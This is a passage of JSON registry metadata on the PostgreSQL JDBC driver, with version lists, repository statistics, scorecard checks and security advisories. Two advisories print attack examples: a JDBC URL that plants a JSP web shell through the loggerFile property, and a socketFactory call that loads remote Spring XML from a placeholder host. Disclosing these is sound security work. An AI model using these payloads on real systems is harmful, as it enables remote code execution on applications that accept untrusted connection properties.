42.2.19.jre7","42.2.20","42.2.20.jre6","42.2.20.jre7","42.2.21","42.2.21.jre6","42.2.21.jre7","42.2.22","42.2.22.jre6","42.2.22.jre7","42.2.23","42.2.23.jre6","42.2.23.jre7","42.2.24","42.2.24.jre6","42.2.24.jre7","42.2.25","42.2.25.jre6","42.2.25.jre7","42.3.0","42.3.1","42.3.2","42.3.3","42.3.4","42.3.5","42.3.6","42.4.0"],"unaffected_versions":["42.2.26","42.2.26.jre6","42.2.26.jre7","42.2.27","42.2.27.jre6","42.2.27.jre7","42.2.28","42.2.28.jre7","42.2.29","42.3.7","42.3.8","42.3.9","42.3.10","42.4.1","42.4.2","42.4.3","42.4.4","42.4.5","42.5.0","42.5.1","42.5.2","42.5.3","42.5.4","42.5.5","42.5.6","42.6.0","42.6.1","42.6.2","42.7.0","42.7.1","42.7.2","42.7.3","42.7.4","42.7.5","42.7.6","42.7.7","42.7.8","42.7.9","42.7.10","42.7.11"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMzhmLWM0aDQtaHFxMs4AAt2m/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oODZ3LW01cm0teHIzM84AAfdY","url":"https://github.com/advisories/GHSA-h86w-m5rm-xr33","title":"Unescaped parameters in the PostgreSQL JDBC driver","description":"Interaction error in the PostgreSQL JDBC driver before 8.2, when used with a PostgreSQL server with the \"standard_conforming_strings\" option enabled, such as the default configuration of PostgreSQL 9.1, does not properly escape unspecified JDBC statement parameters, which allows remote attackers to perform SQL injection attacks.  NOTE: as of 20120330, it was claimed that the upstream developer planned to dispute this issue, but an official dispute has not been posted as of 20121005.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-05-17T05:20:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2012-1618","https://bugzilla.novell.com/show_bug.cgi?id=754273","http://archives.neohapsis.com/archives/bugtraq/2012-03/0126.html","http://lists.opensuse.org/opensuse-security/2012-03/msg00024.html","http://www.openwall.com/lists/oss-security/2012/03/30/8","http://www.openwall.com/lists/oss-security/2012/03/30/9","http://www.openwall.com/lists/oss-security/2012/03/31/1","http://www.openwall.com/lists/oss-security/2012/04/02/4","http://www.openwall.com/lists/oss-security/2012/04/04/11","http://www.openwall.com/lists/oss-security/2012/04/04/4","http://www.openwall.com/lists/oss-security/2012/04/04/5","http://www.openwall.com/lists/oss-security/2012/04/04/9","http://www.osvdb.org/80641","https://github.com/advisories/GHSA-h86w-m5rm-xr33"],"source_kind":"github","identifiers":["GHSA-h86w-m5rm-xr33","CVE-2012-1618"],"repository_url":null,"blast_radius":0.0,"created_at":"2023-02-14T01:03:01.663Z","updated_at":"2026-06-04T03:08:45.925Z","epss_percentage":0.019,"epss_percentile":0.83525,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oODZ3LW01cm0teHIzM84AAfdY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oODZ3LW01cm0teHIzM84AAfdY","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"8.2","vulnerable_version_range":"\u003c 8.2"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oODZ3LW01cm0teHIzM84AAfdY/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03MjdoLWhydzgtamc4cc0xPQ","url":"https://github.com/advisories/GHSA-727h-hrw8-jg8q","title":"Path traversal in org.postgresql:postgresql","description":"In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2022-03-11T00:02:02.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8","https://nvd.nist.gov/vuln/detail/CVE-2022-26520","https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3","https://jdbc.postgresql.org/documentation/head/tomcat.html","https://www.debian.org/security/2022/dsa-5196","https://github.com/pgjdbc/pgjdbc/pull/2454/commits/017b929977b4f85795f9ad2fa5de6e80978b8ccc","https://github.com/advisories/GHSA-727h-hrw8-jg8q"],"source_kind":"github","identifiers":["GHSA-727h-hrw8-jg8q","CVE-2022-26520"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2022-12-21T16:11:59.888Z","updated_at":"2026-06-19T07:10:13.780Z","epss_percentage":0.01136,"epss_percentile":0.78856,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03MjdoLWhydzgtamc4cc0xPQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03MjdoLWhydzgtamc4cc0xPQ","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.3.3","vulnerable_version_range":"\u003e= 42.1.0, \u003c 42.3.3"}],"purl":null,"statistics":{"dependent_packages_count":3652,"dependent_repos_count":176054,"downloads":null,"downloads_period":null},"affected_versions":["42.1.0","42.1.0.jre7","42.1.1","42.1.1.jre6","42.1.1.jre7","42.1.2","42.1.2.jre6","42.1.2.jre7","42.1.3","42.1.3.jre6","42.1.3.jre7","42.1.4","42.1.4.jre6","42.1.4.jre7","42.2.0","42.2.0.jre6","42.2.0.jre7","42.2.1","42.2.1.jre6","42.2.1.jre7","42.2.2","42.2.2.jre6","42.2.2.jre7","42.2.3","42.2.3.jre6","42.2.3.jre7","42.2.4","42.2.4.jre6","42.2.4.jre7","42.2.5","42.2.5.jre6","42.2.5.jre7","42.2.6","42.2.6.jre6","42.2.6.jre7","42.2.7","42.2.7.jre6","42.2.7.jre7","42.2.8","42.2.8.jre6","42.2.8.jre7","42.2.9","42.2.9.jre6","42.2.9.jre7","42.2.10","42.2.10.jre6","42.2.10.jre7","42.2.11","42.2.11.jre6","42.2.11.jre7","42.2.12","42.2.12.jre6","42.2.12.jre7","42.2.13","42.2.13.jre6","42.2.13.jre7","42.2.14","42.2.14.jre6","42.2.14.jre7","42.2.15","42.2.15.jre6","42.2.15.jre7","42.2.16","42.2.16.jre6","42.2.16.jre7","42.2.17","42.2.17.jre6","42.2.17.jre7","42.2.18","42.2.18.jre6","42.2.18.jre7","42.2.19","42.2.19.jre6","42.2.19.jre7","42.2.20","42.2.20.jre6","42.2.20.jre7","42.2.21","42.2.21.jre6","42.2.21.jre7","42.2.22","42.2.22.jre6","42.2.22.jre7","42.2.23","42.2.23.jre6","42.2.23.jre7","42.2.24","42.2.24.jre6","42.2.24.jre7","42.2.25","42.2.25.jre6","42.2.25.jre7","42.2.26","42.2.26.jre6","42.2.26.jre7","42.2.27","42.2.27.jre6","42.2.27.jre7","42.2.28","42.2.28.jre7","42.2.29","42.3.0","42.3.1","42.3.2"],"unaffected_versions":["9.4.1207","9.4.1207.jre6","9.4.1207.jre7","9.4.1208","9.4.1208.jre6","9.4.1208.jre7","9.4.1209","9.4.1209.jre6","9.4.1209.jre7","9.4.1210","9.4.1210.jre6","9.4.1210.jre7","9.4.1211","9.4.1211.jre6","9.4.1211.jre7","9.4.1212","9.4.1212.jre6","9.4.1212.jre7","42.0.0","42.0.0.jre6","42.0.0.jre7","42.3.3","42.3.4","42.3.5","42.3.6","42.3.7","42.3.8","42.3.9","42.3.10","42.4.0","42.4.1","42.4.2","42.4.3","42.4.4","42.4.5","42.5.0","42.5.1","42.5.2","42.5.3","42.5.4","42.5.5","42.5.6","42.6.0","42.6.1","42.6.2","42.7.0","42.7.1","42.7.2","42.7.3","42.7.4","42.7.5","42.7.6","42.7.7","42.7.8","42.7.9","42.7.10","42.7.11"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03MjdoLWhydzgtamc4cc0xPQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02NzNqLXFtNWYteHB2OM0saw","url":"https://github.com/advisories/GHSA-673j-qm5f-xpv8","title":"pgjdbc Arbitrary File Write Vulnerability","description":"### Overview\nThe connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control.\n\nIt's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system.\n\nWhile we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging.\n\nIf you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application.\n\n### Impact\nIt is possible to specify an arbitrary filename in the loggerFileName connection parameter\n\"jdbc:postgresql://localhost:5432/test?user=test\u0026password=test\u0026loggerLevel=DEBUG\u0026loggerFile=./blah.jsp\u0026\u003c%Runtime.getRuntime().exec(request.getParameter(\\\"i\\\"));%\u003e\"\n\nThis creates a valid JSP file which could lead to a Remote Code Execution \n\n### Patches\nLoggerFile implementation has been removed and will be ignored by the driver, fixed in 42.3.3\n\n### Workarounds\nsanitize the inputs to the driver\n\nReported by Allan Lou v3ged0ge@gmail.com","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-16T00:08:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8","https://github.com/pgjdbc/pgjdbc/commit/f6d47034a4ce292e1a659fa00963f6f713117064","https://github.com/advisories/GHSA-673j-qm5f-xpv8"],"source_kind":"github","identifiers":["GHSA-673j-qm5f-xpv8"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.676Z","updated_at":"2026-05-01T03:05:46.664Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02NzNqLXFtNWYteHB2OM0saw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02NzNqLXFtNWYteHB2OM0saw","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.3.3","vulnerable_version_range":"\u003e= 42.1.0, \u003c 42.3.3"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02NzNqLXFtNWYteHB2OM0saw/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTg4Y2MtZzgzNS03NnJw","url":"https://github.com/advisories/GHSA-88cc-g835-76rp","title":"Improper Restriction of XML External Entity Reference","description":"PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-02-10T00:30:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-13692","https://github.com/pgjdbc/pgjdbc/commit/14b62aca4764d496813f55a43d050b017e01eb65","https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.13","https://lists.apache.org/thread.html/r00bcc6b2da972e0d6332a4ebc7807e17305d8b8e7fb2ae63d2a3cbfb@%3Ccommits.camel.apache.org%3E","https://lists.apache.org/thread.html/r01ae1b3d981cf2e563e9b5b0a6ea54fb3cac8e9a0512ee5269e3420e@%3Ccommits.camel.apache.org%3E","https://lists.apache.org/thread.html/r0478a1aa9ae0dbd79d8f7b38d0d93fa933ac232e2b430b6f31a103c0@%3Ccommits.camel.apache.org%3E","https://lists.apache.org/thread.html/r1aae77706aab7d89b4fe19be468fc3c73e9cc84ff79cc2c3bd07c05a@%3Ccommits.camel.apache.org%3E","https://lists.apache.org/thread.html/r4bdea189c9991aae7a929d28f575ec46e49ed3d68fa5235825f38a4f@%3Cnotifications.netbeans.apache.org%3E","https://lists.apache.org/thread.html/r631f967db6260d6178740a3314a35d9421facd8212e62320275fa78e@%3Ccommits.camel.apache.org%3E","https://lists.apache.org/thread.html/r7f6d019839df17646ffd0046a99146cacf40492a6c92078f65fd32e0@%3Ccommits.camel.apache.org%3E","https://lists.apache.org/thread.html/rb89f92aba44f524d5c270e0c44ca7aec4704691c37fe106cf73ec977@%3Cnotifications.netbeans.apache.org%3E","https://lists.apache.org/thread.html/rfe363bf3a46d440ad57fd05c0e313025c7218364bbdc5fd8622ea7ae@%3Ccommits.camel.apache.org%3E","https://www.debian.org/security/2022/dsa-5196","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCCAPM6FSNOC272DLSNQ6YHXS3OMHGJC","https://security.netapp.com/advisory/ntap-20200619-0005","https://github.com/advisories/GHSA-88cc-g835-76rp"],"source_kind":"github","identifiers":["GHSA-88cc-g835-76rp","CVE-2020-13692"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2022-12-21T16:12:36.140Z","updated_at":"2026-05-01T03:04:37.818Z","epss_percentage":0.07801,"epss_percentile":0.91857,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTg4Y2MtZzgzNS03NnJw","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTg4Y2MtZzgzNS03NnJw","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.2.13","vulnerable_version_range":"\u003e= 9.4.1212.jre6, \u003c 42.2.13"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTg4Y2MtZzgzNS03NnJw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12N3dnLWNwd2MtMjRtNM0oEA","url":"https://github.com/advisories/GHSA-v7wg-cpwc-24m4","title":"pgjdbc Does Not Check Class Instantiation when providing Plugin Classes","description":"### Impact\n\npgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.\n\nHowever, the driver did not verify if the class implements the expected interface before instantiating the class.\n\nHere's an example attack using an out-of-the-box class from Spring Framework:\n\n```\nDriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext\u0026socketFactoryArg=http://target/exp.xml\");\n```\n\nThe first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-02-02T00:04:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.0,"cvss_vector":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4","https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813","https://nvd.nist.gov/vuln/detail/CVE-2022-21724","https://security.netapp.com/advisory/ntap-20220311-0005/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/","https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html","https://www.debian.org/security/2022/dsa-5196","https://github.com/advisories/GHSA-v7wg-cpwc-24m4"],"source_kind":"github","identifiers":["GHSA-v7wg-cpwc-24m4","CVE-2022-21724"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2022-12-21T16:12:37.252Z","updated_at":"2026-06-09T13:11:10.902Z","epss_percentage":0.03141,"epss_percentile":0.87137,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12N3dnLWNwd2MtMjRtNM0oEA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12N3dnLWNwd2MtMjRtNM0oEA","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.3.2","vulnerable_version_range":"\u003e= 42.3.0, \u003c 42.3.2"},{"first_patched_version":"42.2.25","vulnerable_version_range":"\u003e= 9.4.1208, \u003c 42.2.25"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12N3dnLWNwd2MtMjRtNM0oEA/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.postgresql:postgresql","docker_dependents_count":9838,"docker_downloads_count":2477259248,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.postgresql:postgresql","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.postgresql:postgresql/dependencies","status":null,"funding_links":[],"critical":true,"issue_metadata":{"last_synced_at":"2026-03-15T10:03:57.509Z","issues_count":355,"pull_requests_count":1106,"avg_time_to_close_issue":21320116.11678832,"avg_time_to_close_pull_request":4714478.739514349,"issues_closed_count":136,"pull_requests_closed_count":906,"pull_request_authors_count":132,"issue_authors_count":270,"avg_comments_per_issue":4.892957746478873,"avg_comments_per_pull_request":1.8824593128390597,"merged_pull_requests_count":761,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":63,"past_year_pull_requests_count":348,"past_year_avg_time_to_close_issue":852687.9047619047,"past_year_avg_time_to_close_pull_request":365465.76,"past_year_issues_closed_count":21,"past_year_pull_requests_closed_count":275,"past_year_pull_request_authors_count":29,"past_year_issue_authors_count":53,"past_year_avg_comments_per_issue":2.3333333333333335,"past_year_avg_comments_per_pull_request":0.7097701149425287,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":3,"past_year_merged_pull_requests_count":254,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"davecramer","count":194,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"vlsi","count":167,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":46,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"praiskup","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:postgresql/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:postgresql/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:postgresql/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:postgresql/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:postgresql/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:postgresql/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":608482,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4650711,"name":"com.alibaba.hologres:postgresql-holo","ecosystem":"maven","description":"PostgreSQL JDBC Driver Postgresql","homepage":"https://jdbc.postgresql.org","licenses":"BSD-2-Clause","normalized_licenses":["BSD-2-Clause"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":"com.alibaba.hologres","versions_count":18,"first_release_published_at":"2020-12-31T11:06:59.000Z","latest_release_published_at":"2024-08-20T11:15:59.000Z","latest_release_number":"42.2.26.2","last_synced_at":"2026-06-17T08:00:46.410Z","created_at":"2022-07-25T16:22:47.330Z","updated_at":"2026-06-17T08:00:46.410Z","registry_url":"https://central.sonatype.com/artifact/com.alibaba.hologres/postgresql-holo/","install_command":null,"documentation_url":"https://appdoc.app/artifact/com.alibaba.hologres/postgresql-holo/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-03-14T19:19:55.000Z","size":46673,"stargazers_count":1696,"open_issues_count":622,"forks_count":924,"subscribers_count":79,"default_branch":"master","last_synced_at":"2026-03-15T03:08:24.429Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-03-14T19:19:58.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"86f905c6-23fb-401f-ba06-fc529694e76e","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":256,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: 